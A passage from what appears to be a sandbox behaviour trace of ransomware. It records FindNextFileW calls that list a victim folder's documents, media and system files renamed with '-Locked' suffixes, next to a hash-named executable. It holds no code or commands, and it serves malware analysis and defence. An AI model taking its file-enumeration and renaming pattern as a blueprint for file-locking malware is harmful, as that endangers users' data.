cAlternateFileName="4-0BKI~1.MKV")) returned 1 [0309.988] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e0d6f00, ftCreationTime.dwHighDateTime=0x1d8224f, ftLastAccessTime.dwLowDateTime=0x7ea60580, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xdac2100, ftLastWriteTime.dwHighDateTime=0x1d82242, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", cAlternateFileName="69811A~1.EXE")) returned 1 [0309.988] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327920f7, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327920f7, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x367197fe, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked", cAlternateFileName="69811A~2.EXE")) returned 1 [0309.989] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35f72b69, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35f72b69, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35f72b69, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked-Locked", cAlternateFileName="69811A~3.EXE")) returned 1 [0309.989] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327a0a8d, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327a0a8d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327a0a8d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="autorun.inf-Locked", cAlternateFileName="AUTORU~1.INF")) returned 1 [0309.989] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35fa387f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35fa387f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35fa387f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="autorun.inf-Locked-Locked", cAlternateFileName="AUTORU~2.INF")) returned 1 [0309.989] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x36560d0c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36560d0c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj", cAlternateFileName="BGQH9X~1")) returned 1 [0309.990] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x326a0563, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x326a0563, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x326a0563, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj-Locked", cAlternateFileName="BGQH9X~2")) returned 1 [0309.990] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35fd6d70, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35fd6d70, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35fd6d70, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj-Locked-Locked", cAlternateFileName="BGQH9X~3")) returned 1 [0309.990] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327a9438, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327a9438, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327a9438, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="csI0 APq22kpFx84um.doc-Locked", cAlternateFileName="CSI0AP~2.DOC")) returned 1 [0309.990] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3602eacf, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3602eacf, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3602eacf, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="csI0 APq22kpFx84um.doc-Locked-Locked", cAlternateFileName="CSI0AP~1.DOC")) returned 1 [0309.990] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327b56d2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327b56d2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327b56d2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cx4Ag.doc-Locked", cAlternateFileName="CX4AG~1.DOC")) returned 1 [0309.991] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3608b7bf, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3608b7bf, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3608b7bf, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cx4Ag.doc-Locked-Locked", cAlternateFileName="CX4AG~2.DOC")) returned 1 [0309.991] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327c40db, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327c40db, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327c40db, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="d-a24dz0snVX.xlsx-Locked", cAlternateFileName="D-A24D~2.XLS")) returned 1 [0309.991] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360ab2d2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x360ab2d2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x360ab2d2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="d-a24dz0snVX.xlsx-Locked-Locked", cAlternateFileName="D-A24D~1.XLS")) returned 1 [0309.991] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327d17bd, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327d17bd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327d17bd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0309.991] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360bd8ae, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x360bd8ae, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x360bd8ae, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked-Locked", cAlternateFileName="DESKTO~2.INI")) returned 1 [0309.992] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327effc0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327effc0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327effc0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="G2jIFnab-iHgfnotUdc.wav-Locked", cAlternateFileName="G2JIFN~2.WAV")) returned 1 [0309.992] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360d10bf, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x360d10bf, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x360d10bf, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="G2jIFnab-iHgfnotUdc.wav-Locked-Locked", cAlternateFileName="G2JIFN~1.WAV")) returned 1 [0309.992] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327fc3a2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327fc3a2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327fc3a2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="h aXUsMO6g.png-Locked", cAlternateFileName="HAXUSM~2.PNG")) returned 1 [0309.992] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36130501, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36130501, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36130501, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="h aXUsMO6g.png-Locked-Locked", cAlternateFileName="HAXUSM~1.PNG")) returned 1 [0309.992] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3280deae, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3280deae, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3280deae, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HElJnZ.bmp-Locked", cAlternateFileName="HELJNZ~1.BMP")) returned 1 [0309.993] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x361946b9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x361946b9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x361946b9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HElJnZ.bmp-Locked-Locked", cAlternateFileName="HELJNZ~2.BMP")) returned 1 [0309.993] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32818f84, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32818f84, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32818f84, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HhodZgzF8 9dLBFX.avi-Locked", cAlternateFileName="HHODZG~2.AVI")) returned 1 [0309.993] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3628d5d5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3628d5d5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3628d5d5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HhodZgzF8 9dLBFX.avi-Locked-Locked", cAlternateFileName="HHODZG~1.AVI")) returned 1 [0309.993] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32825171, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32825171, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32825171, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iWyhboFMJLgPq_b7Ud9.avi-Locked", cAlternateFileName="IWYHBO~2.AVI")) returned 1 [0309.994] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x362af9e1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x362af9e1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x362af9e1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iWyhboFMJLgPq_b7Ud9.avi-Locked-Locked", cAlternateFileName="IWYHBO~1.AVI")) returned 1 [0309.994] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32830233, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32830233, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32830233, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IZrQfjN.m4a-Locked", cAlternateFileName="IZRQFJ~1.M4A")) returned 1 [0309.994] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x362cf450, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x362cf450, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x362cf450, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IZrQfjN.m4a-Locked-Locked", cAlternateFileName="IZRQFJ~2.M4A")) returned 1 [0309.994] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32841392, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32841392, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32841392, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L0Cw.docx-Locked", cAlternateFileName="L0CW~2.DOC")) returned 1 [0309.995] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3630777f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3630777f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3630777f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L0Cw.docx-Locked-Locked", cAlternateFileName="L0CW~1.DOC")) returned 1 [0309.995] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3284eac3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3284eac3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3284eac3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L3CXAN4c0b0rw2-.mkv-Locked", cAlternateFileName="L3CXAN~2.MKV")) returned 1 [0309.995] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364167a2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364167a2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364167a2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L3CXAN4c0b0rw2-.mkv-Locked-Locked", cAlternateFileName="L3CXAN~1.MKV")) returned 1 [0309.995] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3285ad2f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3285ad2f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3285ad2f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L_wFYu3lS.pptx-Locked", cAlternateFileName="L_WFYU~2.PPT")) returned 1 [0309.995] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3641ef6c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3641ef6c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3641ef6c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L_wFYu3lS.pptx-Locked-Locked", cAlternateFileName="L_WFYU~1.PPT")) returned 1 [0309.996] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3286843c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3286843c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3286843c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MyZQDkF.mp3-Locked", cAlternateFileName="MYZQDK~1.MP3")) returned 1 [0309.996] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36425180, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36425180, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36425180, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MyZQDkF.mp3-Locked-Locked", cAlternateFileName="MYZQDK~2.MP3")) returned 1 [0309.996] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3287204a, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3287204a, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3287204a, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nRKT5nI-9Sno8sTzM1P5.wav-Locked", cAlternateFileName="NRKT5N~2.WAV")) returned 1 [0309.996] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3642edd9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3642edd9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3642edd9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nRKT5nI-9Sno8sTzM1P5.wav-Locked-Locked", cAlternateFileName="NRKT5N~1.WAV")) returned 1 [0309.996] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3287d036, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3287d036, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3287d036, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OqWYTp.bmp-Locked", cAlternateFileName="OQWYTP~1.BMP")) returned 1 [0309.997] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364363bc, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364363bc, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364363bc, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OqWYTp.bmp-Locked-Locked", cAlternateFileName="OQWYTP~2.BMP")) returned 1 [0309.997] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3288a749, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3288a749, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3288a749, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SkBr_ODTO7.ppt-Locked", cAlternateFileName="SKBR_O~2.PPT")) returned 1 [0309.997] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364439d9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364439d9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364439d9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SkBr_ODTO7.ppt-Locked-Locked", cAlternateFileName="SKBR_O~1.PPT")) returned 1 [0309.997] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32896a80, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32896a80, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32896a80, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoNi.jpg-Locked", cAlternateFileName="SONI~1.JPG")) returned 1 [0309.997] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3644aec5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3644aec5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3644aec5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoNi.jpg-Locked-Locked", cAlternateFileName="SONI~2.JPG")) returned 1 [0309.997] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328add42, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328add42, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328add42, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sTLRgmy.flv-Locked", cAlternateFileName="STLRGM~1.FLV")) returned 1 [0309.997] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: 